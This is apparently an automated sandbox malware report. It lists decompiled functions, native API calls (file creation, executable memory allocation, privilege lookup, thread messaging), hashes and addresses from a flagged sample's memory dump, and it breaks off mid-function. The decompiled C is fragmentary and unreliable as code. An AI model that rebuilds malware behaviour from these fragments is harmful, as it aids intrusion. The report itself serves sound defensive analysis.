Function 00419D5A, Relevance: 1.5, APIs: 1, Instructions: 48
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00419D5A(void* __ebx, void* __ecx, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44, void* _a48) {
				char _v1;
				char* _t79;

				gs =  *((intOrPtr*)(__ecx + 0x54));
				_t79 =  &_v1;
				asm("cmpsb");
				if (_t79 != 0) goto L3;
				_push(_t79);
			}

0x00419d5a
0x00419d5d
0x00419d5e
0x00419d5f
0x00419d60

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: feaa8398807b6fb96e7716276cc66b0b518c7afcbcbd638751429a959111c507
Instruction ID: f9381d7134a1cfda0c2c6443e205c53c510c5da5d86aabae719b77e45fbee567
Opcode Fuzzy Hash: feaa8398807b6fb96e7716276cc66b0b518c7afcbcbd638751429a959111c507
Instruction Fuzzy Hash: 1601ECB2205108BBDB08CF88DC95EDB77ADEF8D714F158688FA4D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x00419f4f
0x00419f57
0x00419f79
0x00419f7d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79

Memory Dump Source

Source File: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F3A, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00419F3A(void* __esi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;
				void* _t22;
				intOrPtr _t29;

				asm("pushfd");
				asm("sbb esp, [edi+0x55]");
				 *((intOrPtr*)(__esi - 0x741374ab)) = _t29;
				_t11 = _a4;
				_push(__esi);
				_t4 = _t11 + 0xc60; // 0xca0
				E0041A960(_t22, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}

0x00419f3a
0x00419f3b
0x00419f3e
0x00419f43
0x00419f49
0x00419f4f
0x00419f57
0x00419f79
0x00419f7d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79

Memory Dump Source

Source File: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 61b04c525a77874d67790ec602b4d2c75a8c0533b9dd944b7610317aac1f782d
Instruction ID: 3801971514b8a8089897fd999247aec2ae4abfdd80a9c7b57ec9780c92e2fe1b
Opcode Fuzzy Hash: 61b04c525a77874d67790ec602b4d2c75a8c0533b9dd944b7610317aac1f782d
Instruction Fuzzy Hash: 8FF082B1110149ABCB14EF58DC81CA7BBA8FF48214B05864DFD5897202C234E465CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00419E8A, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00419E8A(signed int __eax, void* _a1, intOrPtr _a4, void* _a8) {
				long _t9;
				void* _t12;
				signed int _t17;

				_t17 = __eax * 0x558427da;
				_push(_t17);
				_t6 = _a4;
				_t2 = _t6 + 0x10; // 0x300
				_t3 = _t6 + 0xc50; // 0x40a923
				E0041A960(_t12, _a4, _t3,  *_t2, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}

0x00419e8b
0x00419e90
0x00419e93
0x00419e96
0x00419e9f
0x00419ea7
0x00419eb5
0x00419eb9

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 7f824ee33eaed075c4ceca4afb4a4bdb26db5310f2e6f58857ff35fe34f7727d
Instruction ID: 51a1225ca4a49fe52bd5489eb7f031ca537e9b0c3824b2144be3092b8b180da6
Opcode Fuzzy Hash: 7f824ee33eaed075c4ceca4afb4a4bdb26db5310f2e6f58857ff35fe34f7727d
Instruction Fuzzy Hash: 29E0C275200208ABD710EFE4CC86FD77B68EF44B20F058559BA5C9B242D530FA5087D0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00419e93
0x00419e96
0x00419e9f
0x00419ea7
0x00419eb5
0x00419eb9

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00AB98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AB98FA

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 55af104e65493959a3b045fc209df0a4fc67bea0fd4d261e75c82f7522778e97
Instruction ID: ca347d956d130fc28e9bf3ecbfcfc175f6ca726f6af44adc79914e3c3c1641a5
Opcode Fuzzy Hash: 55af104e65493959a3b045fc209df0a4fc67bea0fd4d261e75c82f7522778e97
Instruction Fuzzy Hash: 3290026160500502D30171694404B16000A97D0381F92C036A1114595ECA658992F171

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AB986A

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7eabb48c259bb7b693792b69cfcdbbaf4cc8ebc98c062eef8b1e13ddbf4ad1df
Instruction ID: 47e3c99fb5e71eb188e40da21ff5119dcd9d9a48cd65bc5c51f461d00f38e03c
Opcode Fuzzy Hash: 7eabb48c259bb7b693792b69cfcdbbaf4cc8ebc98c062eef8b1e13ddbf4ad1df
Instruction Fuzzy Hash: 9B90027120500413D31161694504B07000997D0381F92C436A0514598D96968952F161

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AB984A

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1df5af19f398aa5e1449371e36dfa91e6ac0e31a47086ca7718e99c651ee7b47
Instruction ID: 3d3d17baa0602041cc143a76009b3f3fa99b49e95e50b47cc2ee624adef075e7
Opcode Fuzzy Hash: 1df5af19f398aa5e1449371e36dfa91e6ac0e31a47086ca7718e99c651ee7b47
Instruction Fuzzy Hash: 10900261246041525745B1694404A074006A7E0381792C036A1504990C85669856E661

Uniqueness

Uniqueness Score: -1.00%

Function 00AB99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AB99AA

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f02b987e84a2bf44f29fb82309372205d625bac10cc0758a179ea3cefaa8914
Instruction ID: c026f655fec7fa114ab613049bd28a9a4c0a60f4a22d9b6420e8ea7a610899b8
Opcode Fuzzy Hash: 5f02b987e84a2bf44f29fb82309372205d625bac10cc0758a179ea3cefaa8914
Instruction Fuzzy Hash: 3C9002A134500442D30061694414F060005D7E1341F52C039E1154594D8659CC52B166

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AB991A

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d177ac9f029d5cbe6d9ab378e25ccc84729e077cda3ce39aca23f9526e6c152b
Instruction ID: 51b2ab36ccd8a3418056d602dac2de474d8b3dd97001d7f37f8fc799697b06e9
Opcode Fuzzy Hash: d177ac9f029d5cbe6d9ab378e25ccc84729e077cda3ce39aca23f9526e6c152b
Instruction Fuzzy Hash: 139002B120500402D34071694404B46000597D0341F52C035A5154594E86998DD5B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AB9A2A

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ef5b5a9c25c2270d0afa3a0f40a788ca74ae82ef3af4d381feba62222488011
Instruction ID: 01bdc4a1eab63954c2403bd72f59dccc8c5e2dd31fc2bd06c26da9b2c7d2dd71
Opcode Fuzzy Hash: 6ef5b5a9c25c2270d0afa3a0f40a788ca74ae82ef3af4d381feba62222488011
Instruction Fuzzy Hash: 1A90026160500042434071798844E064005BBE1351752C135A0A88590D85998865A6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AB9A0A

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 424a4366bc60731b194a54b1a0206c8e6790e0376b178187627ebd0c0579b9b7
Instruction ID: fbad0c2c4dcec2923ebb553f7525d3212f8f99b3f91adfd1834d07fcbcd40fbf
Opcode Fuzzy Hash: 424a4366bc60731b194a54b1a0206c8e6790e0376b178187627ebd0c0579b9b7
Instruction Fuzzy Hash: AB90027120540402D30061694814B0B000597D0342F52C035A1254595D86658851B5B1

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AB9A5A

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 69251470b054167587144225613d435ddac39fb37cedd54a47e8a637dfcb2ca8
Instruction ID: ae7da978a7e5cde2a2f0c6cb20f3141907a17bba57da171a0684a8b24ad60794
Opcode Fuzzy Hash: 69251470b054167587144225613d435ddac39fb37cedd54a47e8a637dfcb2ca8
Instruction Fuzzy Hash: D790026121580042D30065794C14F07000597D0343F52C139A0244594CC9558861A561

Uniqueness

Uniqueness Score: -1.00%

Function 00AB95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AB95DA

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 797798abf11402d3515bbf2e2054553b757dc12ab012c32876eb4273776634f0
Instruction ID: 6381622d47ce0e66eb2de472c1f860bcdd3cab034cd1b972542807a7c8a8d7b0
Opcode Fuzzy Hash: 797798abf11402d3515bbf2e2054553b757dc12ab012c32876eb4273776634f0
Instruction Fuzzy Hash: F39002A120600003430571694414B16400A97E0341B52C035E11045D0DC5658891B165

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AB954A

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c685e1bf2ffcbef8aeaf0caa9d5810a29604edb2db45c430f1a2c5df5253f61
Instruction ID: b8fd0063769497a3c4a5a0bd6fe35cb974202eb275c34afae74f1d5b9240f4ad
Opcode Fuzzy Hash: 2c685e1bf2ffcbef8aeaf0caa9d5810a29604edb2db45c430f1a2c5df5253f61
Instruction Fuzzy Hash: 37900265215000030305A5690704A07004697D5391352C035F1105590CD6618861A161

Uniqueness

Uniqueness Score: -1.00%

Function 00AB96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AB96EA

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 517d64f09a84495556f18a2c36617c4eebc6565cc665ab382a9f3fe36f1f8912
Instruction ID: 1be88d5a2eb8e1157703dafa4542dbe18b3bff5bb0e0eea057e283ca6be5da01
Opcode Fuzzy Hash: 517d64f09a84495556f18a2c36617c4eebc6565cc665ab382a9f3fe36f1f8912
Instruction Fuzzy Hash: 9A90027120508802D31061698404B4A000597D0341F56C435A4514698D86D58891B161

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AB966A

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e2ad52f04dcbd3adec45e5557663e323cdc2a281221a9cebe1a983fd8a6a78e4
Instruction ID: 2100620bea3a32f8e19b9d102ffd03e8059d5de84ad96fdeb43e22a3d7cdc196
Opcode Fuzzy Hash: e2ad52f04dcbd3adec45e5557663e323cdc2a281221a9cebe1a983fd8a6a78e4
Instruction Fuzzy Hash: 1B90027120500802D38071694404B4A000597D1341F92C039A0115694DCA558A59B7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00AB97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AB97AA

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3a9afe3398ff3f7ae5f3414cc529eb05932eeebb581f26b5e19c55083342f285
Instruction ID: 1ceede0a7cb670c4d60282d1e800704b6b0748993a5cb60170de2753694ab54e
Opcode Fuzzy Hash: 3a9afe3398ff3f7ae5f3414cc529eb05932eeebb581f26b5e19c55083342f285
Instruction Fuzzy Hash: DC90026130500003D34071695418B064005E7E1341F52D035E0504594CD9558856A262

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AB978A

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 685c5ce58910f45f5f8e916c1c367af7efa0d2c4020190b4dcefcb5254ece0fa
Instruction ID: 6ab0d2ee7abec32692453d5130e9f00ba43068ef8c65de180ea78c516198fc8e
Opcode Fuzzy Hash: 685c5ce58910f45f5f8e916c1c367af7efa0d2c4020190b4dcefcb5254ece0fa
Instruction Fuzzy Hash: 8290026921700002D38071695408B0A000597D1342F92D439A0105598CC9558869A361

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AB971A

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0cc879964c8d0a8f2b28df8f6bd27908440274e00633c100f94010c983c626a4
Instruction ID: 4fc44ef761ff19529dbd619fe24a43887543a74015ed4c8e16905f9e288fe321
Opcode Fuzzy Hash: 0cc879964c8d0a8f2b28df8f6bd27908440274e00633c100f94010c983c626a4
Instruction Fuzzy Hash: 6990027120500402D30065A95408B46000597E0341F52D035A5114595EC6A58891B171

Uniqueness

Uniqueness Score: -1.00%

Function 00409A90, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004082EA, Relevance: 1.6, APIs: 1, Instructions: 57
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E004082EA(void* __eax, void* __edi, signed int __esi, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				signed int _v326413041;
				void* _t16;
				int _t17;
				void* _t24;
				long _t25;
				signed int _t28;
				intOrPtr _t29;
				int _t30;
				void* _t33;
				void* _t35;
				signed int _t40;

				_t24 = __eax;
				asm("out dx, eax");
				_t28 = __esi & _v326413041;
				_t40 = _t28;
				_t33 = _t35;
				_push(_t28);
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t29 = _a4;
				if(_t40 == 0) {
					_push( &_v68);
					_push(_t29); // executed
				}
				_t16 = E0040ACD0(); // executed
				_t17 = L00414E20(_t29, _t16, 0, 0, 0xc4e7b6d6);
				_t30 = _t17;
				if(_t30 != 0) {
					_push(_t24);
					_t25 = _a8;
					_t17 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					_t43 = _t17;
					if(_t17 == 0) {
						_t17 =  *_t30(_t25, 0x8003, _t33 + (E0040A460(_t43, 1, 8) & 0x000000ff) - 0x40, _t17);
					}
				}
				return _t17;
			}

0x004082ea
0x004082eb
0x004082ed
0x004082ed
0x004082f1
0x004082f6
0x004082ff
0x00408303
0x0040830e
0x00408313
0x00408314
0x00408319
0x0040831d
0x0040831d
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833c
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: d5b26fb49fd02839353d2910a504c6bd434ae9aef0d50c2729b65f95eb303eb8
Instruction ID: 2a5eef8f901314b0843d7a4e3f3ed9fc11bc8c2e66449285936594633f3e174b
Opcode Fuzzy Hash: d5b26fb49fd02839353d2910a504c6bd434ae9aef0d50c2729b65f95eb303eb8
Instruction Fuzzy Hash: 6901DD31A802297AE710A6559C42FFF772CAB40F54F054019FF04BA1C1D6A9691647E9

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E004082F0(void* __ecx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr _t24;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t24 = _a4;
				if(_t30 == 0) {
					_push( &_v68);
					_push(_t24); // executed
				}
				_t12 = E0040ACD0(); // executed
				_t13 = L00414E20(_t24, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t22, 0x8003, _t26 + (E0040A460(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x004082f0
0x004082ff
0x00408303
0x0040830e
0x00408313
0x00408314
0x00408319
0x0040831d
0x0040831d
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x00000000
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA

Uniqueness

Uniqueness Score: -1.00%

Function 004082B4, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E004082B4(void* __edi, void* __eflags) {
				void* _t7;
				int _t8;
				intOrPtr _t11;
				void* _t12;
				void* _t15;
				void* _t18;
				long _t19;
				int _t21;
				int _t22;
				void* _t26;

				_t18 = __edi;
				es = __edi;
				asm("hlt");
				asm("aam 0x2f");
				asm("lahf");
				if(__eflags != 0) {
					if(__eflags == 0) {
						_push(_t26 - 0x40);
						_t21 = _t21 + 0x1c;
						__eflags = _t21;
						_push(_t21); // executed
					}
					_t7 = E0040ACD0(); // executed
					_t8 = L00414E20(_t21, _t7, 0, 0, 0xc4e7b6d6);
					_t22 = _t8;
					__eflags = _t22;
					if(_t22 != 0) {
						_push(_t18);
						_t19 =  *(_t26 + 0xc);
						_t8 = PostThreadMessageW(_t19, 0x111, 0, 0); // executed
						__eflags = _t8;
						if(__eflags == 0) {
							_t8 =  *_t22(_t19, 0x8003, _t26 + (E0040A460(__eflags, 1, 8) & 0x000000ff) - 0x40, _t8);
						}
					}
					return _t8;
				} else {
					_t11 =  *0x563b268c;
					_push(_t21);
					_t12 = E0041B2A0(_t11, _t15, 0x11c6f95e);
					return E0041B150(_t15) + _t12 + 0x1000;
				}
			}

0x004082b4
0x004082b4
0x004082b6
0x004082b7
0x004082b9
0x004082ba
0x00408314
0x00408319
0x0040831a
0x0040831a
0x0040831d
0x0040831d
0x0040831e
0x0040832e
0x00408333
0x00408338
0x0040833a
0x0040833c
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x0040836d
0x00408372
0x004082bc
0x004082bc
0x004082c0
0x004082c6
0x004082dd
0x004082dd

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: de1e0d92b6ecf77f32070f4208c109dfdd12e0b4867e729d3a71f3bc223bba47
Instruction ID: 7f6eeffa05ea93399c95f5b2e60ad50501f8bff5ba0d770fd4db3e3038a0bd11
Opcode Fuzzy Hash: de1e0d92b6ecf77f32070f4208c109dfdd12e0b4867e729d3a71f3bc223bba47
Instruction Fuzzy Hash: B501203194021476DA20AAA45C43FFE2318A780F15F05416FFF44BB1C1DABD590546E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1C1, Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0041A1C1(void* __eax, signed int __ecx, void* __edx, void* __edi, void* __eflags, int _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr* __esi;
				signed int __ebp;
				intOrPtr* _t22;
				void* _t24;

				if(__eflags < 0) {
					 *0x094C3802 =  *0x094C3802 & __ecx;
					asm("sbb [ebx-0x74adeb3c], al");
					asm("adc al, 0x50");
					return  *((intOrPtr*)( *_t22))(_a12, _a16, __edx, __ecx, _t24);
				} else {
					__eax = __eax << __cl;
					__eflags =  *((intOrPtr*)(__edi + 0x26)) - __ah;
					__esp = __esp ^  *(__edx - 0x1374aac0);
					__eflags = __esp;
					__ebp = __esp;
					__eax = _a4;
					__ecx =  *((intOrPtr*)(__eax + 0xa18));
					__esi = __eax + 0xc8c;
					__eax = E0041A960(__edi, __eax, __esi,  *((intOrPtr*)(__eax + 0xa18)), 0, 0x46);
					__edx = _a16;
					__eax = _a12;
					__ecx = _a8;
					__edx =  *__esi;
					__eax = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
